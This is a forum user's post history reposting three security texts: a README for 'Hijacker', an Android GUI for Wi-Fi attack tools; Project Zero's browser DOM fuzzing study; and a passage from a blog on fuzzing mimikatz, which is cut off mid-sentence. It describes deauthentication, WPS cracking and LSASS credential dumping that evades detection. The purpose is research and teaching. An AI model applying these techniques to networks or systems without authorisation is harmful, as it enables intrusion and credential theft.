-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
Hijacker Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work. Features Information Gathering View a list of access points and stations (clients) around you (even hidden ones) View the activity of a specific network (by measuring beacons and data packets) and its clients Statistics about access points and stations See the manufacturer of a device (AP or station) from the OUI database See the signal power of devices and filter the ones that are closer to you Save captured packets in .cap file Attacks Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target) Deauthenticate a specific client from the network it's connected MDK3 Beacon Flooding with custom options and SSID list MDK3 Authentication DoS for a specific network or to everyone Capture a WPA handshake or gather IVs to crack a WEP network Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter) Other Leave the app running in the background, optionally with a notification Copy commands or MAC addresses to clipboard Includes the required tools, no need for manual installation Includes the nexmon driver and management utility for BCM4339 devices Set commands to enable and disable monitor mode automatically Crack .cap files with a custom wordlist Create custom actions and run them on an access point or a client easily Sort and filter Access Points with many parameters Export all the gathered information to a file Add an alias to a device (by MAC) for easier identification More Screenshots Installation Make sure: you are on Android 5+ you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU) have a firmware to support Monitor Mode on your wireless interface Download the latest version here. When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode. Troubleshooting This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need. In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings. If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version. Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected. Warning Legal It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause. Device The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned. Donate If you like my work, you can buy me a beer. Sursa: https://github.com/chrisk44/Hijacker
-
- 2
-
-
-
Thursday, September 21, 2017 The Great DOM Fuzz-off of 2017 Posted by Ivan Fratric, Project Zero Introduction Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs. An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing. The fuzzer For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing. We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions. The fuzzer consists of several parts: The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing. The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part. A set of grammars for generating HTML, CSS and JavaScript code. One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach: I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property. Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as: Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs. Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation. Setup We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run. Here are additional details of the fuzzing setup for each browser: Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds. Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build. Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues. Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing. Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac. Results Without further ado, the number of security bugs found in each browsers are captured in the table below. Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release). Vendor Browser Engine Number of Bugs Project Zero Bug IDs Google Chrome Blink 2 994, 1024 Mozilla Firefox Gecko 4* 1130, 1155, 1160, 1185 Microsoft Internet Explorer Trident 4 1011, 1076, 1118, 1233 Microsoft Edge EdgeHtml 6 1011, 1254, 1255, 1264, 1301, 1309 Apple Safari WebKit 17 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250 Total 31** *While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers **The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another. However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit. It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of an useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it! When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats. Experimenting with coverage-guided DOM fuzzing Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows: The fuzzer generates a new set of samples by mutating existing samples in the corpus. The fuzzer spawns IE process which opens a harness HTML page. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus. Go to step 3 until all samples are executed or the IE process crashes Periodically minimize the corpus using the AFL’s cmin algorithm. Go to step 1. The following set of mutations was used to produce new samples from the existing ones: Adding new CSS rules Adding new properties to the existing CSS rules Adding new HTML elements Adding new properties to the existing HTML elements Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them. Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way. Conclusion As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture. The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts. Posted by Ben at 9:35 AM Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
-
HACK THE HACKER – FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY) On 22. Sep In this blogpost, I want to explain two topics from a theoretical and practical point of view: How to fuzz windows binaries with source code available (this part is for developers) and How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical) Since this blog post got too long and I didn’t want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws you can jump to chapter “Practice: Analysis of the identified crashes“. I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers and therefore I wanted to test different approaches to fuzz windows applications where source code is available (the audience are most likely developers). To my knowledge there are several blog posts talking about fuzzing Linux applications with AFL or libfuzzer (just compile the application with afl-gcc instead of gcc or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development and therefore all developers should know how to do it correctly and that such a setup can be simple and fast! WHY I CHOSE MIMIKATZ AS FUZZING TARGET To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz because it’s an extremely useful tool for security consultants (and hackers) and I always wanted to understand how mimikatz internally works. Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged on users, machine certificates and many other things. Moreover, mimikatz contains over 261 000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy gentilkiwi, the author of mimikatz. The next thing I need is a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger the vulnerability? Mimikatz can be used to dump cleartext credentials and hashes of currently logged in users from the LSASS process. But if there exists a bug in the parsing code of mimikatz, what exactly could I achieve with this? I could just exploit myself because mimikatz gets executed on the same system. Well, not always. As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it’s nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kind of alerts (AntiVirus, Application Whitelisting, Windows Logs, …) and because we want to stay under the radar, we don’t want these alerts. Instead, we can use Microsoft signed binaries to dump the LSASS process (e.g.: Task manager, procdump.exe, msbuild.exe or sqldumper.exe). Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system reading our manipulated memory dump file and watch reverse shells coming in! This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/). To be fair, exploiting this scenario can be quite difficult because mimikatz is compiled with protections, such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we don’t have the luxury of a remote memory leak nor of scripting possibilities such as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible, for example see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP). THEORY: FUZZING WINDOWS BINARIES We don’t want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on), instead, we want to use something which is called “coverage-guided fuzzing” (or feedback-based fuzzing). This means we want to extract code coverage information during fuzzing. If one of our mutated input files (the memory dump files) generate more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths itself (ideally all) for us and therefore “learn” all the internal parsing logic autonomously! This also means that we only have to write a fuzzer one time and can use it against nearly all kinds of applications! Luckily for us, we don’t even have to write such a fuzzer because someone else already did an excellent job! Currently the most commonly used fuzzer is called AFL (American fuzzy lop) and implements exactly this idea. It turned out that AFL is extremely effective in identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL: It is extremely fast. It extracts edge coverage (with hit count) and not only code coverage which simplified means that we try to maximize executed “paths” and not “code” (E.g. if we have an IF statement, code coverage would put the input file which executes the code inside the IF into the queue. Edge coverage on the other side would put one entry with, and one entry without the IF body-code into the queue.). Because of 1) it can implement deterministic mutation (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing. It’s extremely simple to use. Fuzzing can be started within several minutes! The big question is now: How does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to “hack” generated object files from gcc and insert at all possible code locations instrumentation code. There is also a LLVM mode where a LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode if source code is not available which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL). Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can dynamically instrument (during runtime) the target binary which means that a dispatcher loads the next instructions which should be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while being completely transparent to the target application. This is quite complicated but the framework hides all that logic from the user. Obviously, this approach is not fast (but works on Windows and has many cool features for the future!). When source code is available, I thought that there should be the same possibility as AFL does on Linux (with GCC). My first attempt was to use “libfuzzer” on Windows. Libfuzzer is a fuzzer like AFL but it acts on function level fuzzing and is therefore more suitable for developers. AFL fuzzes full binaries per default but can also be started in a persistent mode where it fuzzes on function level. Libfuzzer uses the feature “Source-based code coverage” from the LLVM clang compiler which is exactly what I wanted to use for coverage-information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for “source-based code coverage” I got again some errors which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more a pain than anything else, I didn’t pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future! The next thing I tested was WinAFL in syzygy mode and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel 0vercl0k Souchet (developer of the syzygy mode) for their amazing job and of course Michal Zalewski for AFL! PRACTICE: FUZZING WINDOWS BINARIES You can download WinAFL from here: https://github.com/ivanfratric/winafl All we must do is include the header and add the code: While(__afl_persistent_loop()) { // code to fuzz } to the project which we want to fuzz and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile). For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc,argc) because I wanted to directly dump the hashes/passwords from the minidump (issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would extract this information per default from the LSASS process I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { kuhl_m_sekurlsa_reset(); // sekurlsa::minidump command pMinidumpName = argv[1]; // sekurlsa::minidump command kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); // sekurlsa::logonpasswords command } Return NT_SUCCESS; } Hint: Do not use the above code during fuzzing. I added a subtle flaw, which I’m going to explain later. Can you already spot it? After compilation, we can start the binary and see some additional messages: The next step is to instrument the code. For this to work we must register “msdia140.dll”. This can be done via the command: Regsvr32 C:\path\to\msdia140.dll Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb file to add the instrumentation: We can start the instrumented binary and see the adapted status message: Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used task manager to dump the LSASS process), put it into the input directory and start fuzzing: As we can see, we have a file size problem! THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall, that AFL is doing deterministic fuzzing before switching to random fuzzing for each queue input. That means that it is doing specific bit and byte flips/additions/removals/… for every (!) byte/bit in the input! This includes several strategies like bitflip 1/1, bitflip 2/1, …, arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then walks forward 1 bit to flip the next bit. Whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 and that AFL tries to add interesting values to a value treated as 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depend on the file size! Let’s just assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means that we must execute the target application exactly input-filesize (bit) number of times. WinAFL is doing in-memory fuzzing which means that we don’t have to start the application every time, but let’s forget this for now so that our discussion does not get too complicated. Let’s say that our input binary has a size of 10 kB. That are 81920 required executions for the deterministic stage (only for bitflip 1/1)! AFL conducts many more deterministic strategies. For AFL on Linux this is not very huge, it’s not uncommon to get execution speeds of 1000 – 8000 executions / second (because of the fork-server, persistent-mode, …) per core. This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores we can easily do this strategy for one input file within a second. Now let’s assume that our input has a size of 1 MB (AFL limit), which means 8 388 608 required executions for the bitflip 1/1 and that our target application is a little bit slower because it’s bigger and running on Windows (200 exec / sec) and that we just have one core available for fuzzing. Then we need 11,5 hours only to finish the bitflip 1/1 for one input entry! Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again! It’s not uncommon that the queue grows up to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. And in our case the input (memory dump) has a size of 27 MB! This would be 216 036 224 required executions only for bitflip 1/1. AFL detects this and directly aborts because this would just take too long (and AFL would never find vulnerabilities because it’s stuck inside deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good because we still have to find the special byte/bit flip which triggers the vulnerability. And the likelihood for this in such a big input file is not very high…. Here is a cite from Michal Zalewski (author of AFL) from the perf_tips.txt document: To illustrate, let’s say that you’re randomly flipping bits in a file, one bit at a time. Let’s assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs – not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%. The key learning is that input file size is very important during fuzzing! At least as important as plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don’t want to talk about them in this blog post. They shrink files via a fuzzing attempt and since the problem is NP-hard they use heuristics. Tmin is also very slow (execution time depends on the file size…) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex and I don’t want to “waste” time while WinAFL identifies the format. And here is where heatmaps come into play. PRACTICE: FUZZING AND HEATMAPS My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern-search, however, mimikatz parses and uses lots of structures and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don’t want to understand the application to write a specific fuzzer, instead we want that the fuzzer learns everything itself. If we could somehow give the fuzzer the same ability to detect the “important input bytes”… During reading the code I identified something interesting. Mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that it reads nearly all required information from there (sometimes it also copies it via kull_m_minidump_copy, but let’s not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can easily reduce the number of required executions drastically! If mimikatz does not touch a specific memory region, why should we even fuzz the bytes there? Here is a heat map which I generated based on memory read operations from mimikatz on my 27 MB input file (generated via a plotly python script): The black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the left bottom of the picture. I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes and so on. At this zoom level, we do not see access attempts to the start (header) of the memory dump. However, this is only because the file size is 27 MB and therefore the smaller red/yellow/white dots are not visible. But we can zoom in: The most important message from the above pictures: We do not have to fuzz the bytes from the black area! But we can even do better, we can start fuzzing the white bytes (many read attempts, like offset 0xaa00 which gets read several thousand times), then continue with yellow bytes (e.g.: offset 0x08 is read several hundred times) and then red areas (which are only read 1-5 times). This itself is not a perfect approach (more read attempts also mean that the likelihood that the input becomes invalid gets higher and therefore it’s maybe not the best idea to start with white areas but since we must do the full deterministic step it basically does not matter with which offsets we start; Hint: A better strategy is to also consider the triggering read-instruction address together with the hitcounts). You are maybe wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script, however, I’m currently developing a more sophisticated script with the use of dynamic instrumentation frameworks which can extract such information from any application. The use of a debugger script is “stupid” because it’s very slow and does not work for every application. However, for mimikatz it worked fine because mimikatz reads most of the time from the region which is mapped via MapViewOfFile(). My WinAppDbg script is very simple, I just use the Api-Hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded. I placed a memory breakpoint on it and at every breakpoint hit I just log the relative offset and increment the hit counter. You can also extend this script to become more complex (e.g.: hook kull_m_memory_search() or kull_m_minidump_copy(). For reference, here is the script: We start mimikatz via the debugger, as soon as mimikatz finishes (debug.loop() returns), we just sort the offsets based on the hit counts and dump them to a log file. This is the code which hooks MapViewOfFile to obtain the base address of our input in-memory. This code also adds the memory breakpoint (watch_buffer() method) and invokes memory_breakpoint_callback every time an instruction reads from our input. Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script should be extended (e.g. to disable the memory breakpoint for search-functions), the WinAppDbg source must be modified to return the “bw” variable in the watch_buffer() function. All left is the callback function: I used capstone to disassemble the triggering instruction to obtain the size of the read operation to update the offsets correctly. As you can see, there is no magic involved and the script is really simple (at least this one which only works with mimikatz). The downside of the debugger memory breakpoint approach is that it is extremely slow. On my test system, this script executes approximately 30 minutes to execute mimikatz one time which is really slow (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another down-side is that it does not work for all applications because typically applications copy input-bytes to other buffers and access them there. A more general approach is to write such a script with a dynamic instrumentation framework which is also much faster (on which I’m currently working on). Developing such a script is much harder because we have to use shadow memory for taint tracking, follow copies of tainted memory (this taint propagation is a complex part because it requires correct semantic understanding of the x86 instruction set) but store at the same time which byte depends on which input byte and this should be as fast as possible (for fuzzing) and does not consume too much memory (so it’s useable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similiar solutions, most notable TaintScope (however, no source code or tool public available and it was just a PoC) or VUzzer (based on DataTracker/libdft which themself are based on PIN) and some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either source code and the tool is not public available, or it is very slow or it does not work on Windows or it does not propagate the file offset information (just marks data is tainted or not tainted) or they are written with PIN which itself is slower than DynamoRio. I’m developing my own tool here to fulfil the above mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with Tmin, which also tries to reduce the input file size. However, it does this via a fuzzy approach which is very slow (and can’t handle checksums and file offsets so well). We can also verify that the black bytes don’t matter by just removing (zeroing them out) from the input file: The above figure shows that the output of both files is exactly the same, therefore the black bytes really don’t matter. Now we can start fuzzing with a much smaller input file – only 91KB instead of 27MB! PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN I first started a simple fuzzer (not WinAFL) because I first had to modify the WinAFL code to only fuzz the identified bytes. I recommend to start fuzzing as soon as possible with a simple fuzzer and while it is running work on a better version of the fuzzer. My first fuzzer was a 50 LoC python script which flipped bytes, invoked mimikatz over WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12 core home system (4 cores for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in code (the 28 crashes are just variations of the same 4 bugs in the code). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours, the second exploitable bug was not found at all with this approach. I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the “post_handler” which can be used for test-case post-processing (e.g. fixing checksums, however, it’s better to remove the checksum verification code from the target application). Since this handler is not called for dry-runs (the first executions from AFL) this will not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer. In the input directory I stored a file containing only the heatmap bytes and therefore the file size is much smaller like 91KB or 3KB. Next I added code to write_to_testcase where I copy all bytes from the input file over the heap buffer at the correct positions. Therefore, AFL only sees the small files but passes the correct memory dumps to mimikatz. This approach has a little drawback though. As soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was enough. Later I’m going to invoke the heatmap calculation for every queue entry if a heuristic detects this as more efficient. Please also bear in mind that AFL and WinAFL write every testcase to disk. This means we have to write a 27 MB file per execution (also per in-memory execution like a simple bit flip!!). From performance perspective it would be way better if we modify the testcase inside the target application in-memory (we already do in-memory fuzzing and therefore this is possible). Then we can also skip all the process-switches from WinAFL to the target application and back and then we really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even python code… into the target application, an area on which I’m also currently working on. Here is a screenshot of my WinAFL output (running on a RAMDisk): Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes: First the good thing: We already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique 